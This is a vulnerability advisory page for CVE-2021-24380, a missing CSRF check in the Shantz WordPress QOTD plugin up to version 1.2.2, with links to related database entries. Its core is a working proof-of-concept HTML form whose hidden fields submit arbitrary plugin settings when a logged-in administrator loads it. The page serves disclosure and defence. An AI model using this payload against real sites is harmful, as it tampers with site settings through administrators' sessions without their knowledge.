Lucene search
Prashant Karman PatelWPEX-ID:1DD0F9A8-22AB-4ECC-A925-605822739000HistoryJul 19, 2021 - 12:00 a.m.
Shantz WordPress QOTD <= 1.2.2 - Arbitrary Setting Update via CSRF
2021-07-1900:00:00
Prashant Karman Patel
469
wordpress
shantz qotd
csrf
arbitrary setting update
EPSS
0.001
Percentile
27.4%
The plugin is lacking any CSRF check when updating its settings, allowing attackers to make logged in administrators change them to arbitrary values.
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=shantz-wp-qotd.php" method="POST">
<input type="hidden" name="shantzWpQotdEnable" value="true" />
<input type="hidden" name="shantzWpQotdSrcBox" value="true" />
<input type="hidden" name="shantzWpQotdSrcFile" value="false" />
<input type="hidden" name="shantzWpQotdSeparator" value="" />
<input type="hidden" name="shantzWpQotdDb" value="Quote via CSRF" />
<input type="hidden" name="shantzWpQotdPattern" value="qottd" />
<input type="hidden" name="shantzWpQotdAddAuto" value="true" />
<input type="hidden" name="shantzWpQotdExcludePages" value="false" />
<input type="hidden" name="shantzWpQotdAddBottom" value="true" />
<input type="hidden" name="shantzWpQotdStaticTextBefore" value="" />
<input type="hidden" name="shantzWpQotdStaticTextAfter" value="" />
<input type="hidden" name="update_shantzWpQotdPluginSettings" value="Update Settings" />
<input type="submit" value="Submit request" />
</form>
</body>
Related
wpvulndb
wpvulndb
Shantz WordPress QOTD <= 1.2.2 - Arbitrary Setting Update via CSRF
2021-07-19 00:00:00
cvelist
cvelist
nvd
nvd
CVE-2021-24380
2021-08-16 11:15:08
prion
prion
Cross site request forgery (csrf)
2021-08-16 11:15:00
cve
cve
CVE-2021-24380
2021-08-16 11:15:08